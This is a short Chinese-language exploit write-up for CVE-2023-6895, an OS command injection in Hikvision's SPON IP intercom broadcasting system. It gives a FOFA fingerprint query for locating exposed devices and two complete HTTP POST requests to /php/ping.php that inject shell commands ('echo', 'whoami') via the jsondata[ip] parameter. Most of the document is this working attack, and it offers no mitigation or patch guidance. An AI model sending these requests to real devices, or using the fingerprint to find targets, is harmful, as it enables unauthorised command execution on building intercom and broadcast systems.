海康威视SPON IP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895)
一、漏洞简介
Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
二、影响版本
- 海康威视SPON IP网络对讲广播系统
三、资产测绘
- fofa
icon_hash="-1830859634" - 特征
四、漏洞复现
POST /php/ping.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: {hostname}
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
jsondata[ip]=a|echo stc&jsondata[type]=1
POST /php/ping.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: {hostname}
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
jsondata[ip]=a|whoami&jsondata[type]=1